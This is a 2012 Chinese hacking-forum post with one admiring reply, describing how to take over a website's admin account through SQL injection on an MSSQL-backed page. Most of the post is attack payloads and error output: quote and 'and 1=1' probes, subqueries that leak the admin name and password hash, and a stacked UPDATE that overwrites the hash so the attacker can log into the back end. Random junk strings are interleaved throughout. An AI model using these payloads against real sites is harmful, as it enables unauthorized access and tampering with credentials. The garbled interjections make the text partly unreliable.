中国网络渗透测试联盟
标题:
SQL注入直接修改管理员密码的MD5值
[打印本页]
作者:
admin
时间:
2012-9-13 17:55
标题:
SQL注入直接修改管理员密码的MD5值
经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
8 b k3 g5 F9 v; u
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
5 }5 c! U. _0 ~( e1 V
测试如下:
- c4 W& G) K! j
http://www.tmdsb.com/news.asp?id=121
% Y n+ ?! H! U
在地址后输入单引号,显示
2 z: T- _% T3 r4 A% V$ j9 b( m
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
3 p+ |: v- z+ B. @+ J. o
字符串 ’’’ 之前有未闭合的引号
# Z( V5 o" g1 b# N* M6 w
/news/tmdws.asp,行63
& W9 O2 s% e/ d2 d0 k
说明没有过滤单引号且数据库是MSSQL.
6 u- i8 {6 e" a, k+ h1 w. `
and 1=1正常。and 1=2出错。肯定存在注入
- T5 C& ^8 w& t# k
接着输入
, a2 b' [4 [& B6 S) z; {! [
http://www.tmdsb.com/news.asp?id=1
or admin_user in (select id from admin)
% d6 }$ ?: j: Y: R
得到帐号为:admin
4 A! S. r# `& d3 U$ j
http://www.tmdsb.com/news.asp?id=121
or admin_password in (select id from admin)
9 p/ Z! W1 o9 R5 S+ P( W+ C
得到密码为:a4716077c2ba075c
. z5 H7 ]! g: J g7 x2 Z Q* w
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
$ K b9 f2 L1 {1 y. M; W
命令如下 :
! I: z$ `/ N0 a+ L1 a
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
' d* \+ ]) E) Q5 M: v
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的
作者:
angel
时间:
2012-9-14 16:22
没法说 一个字牛
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2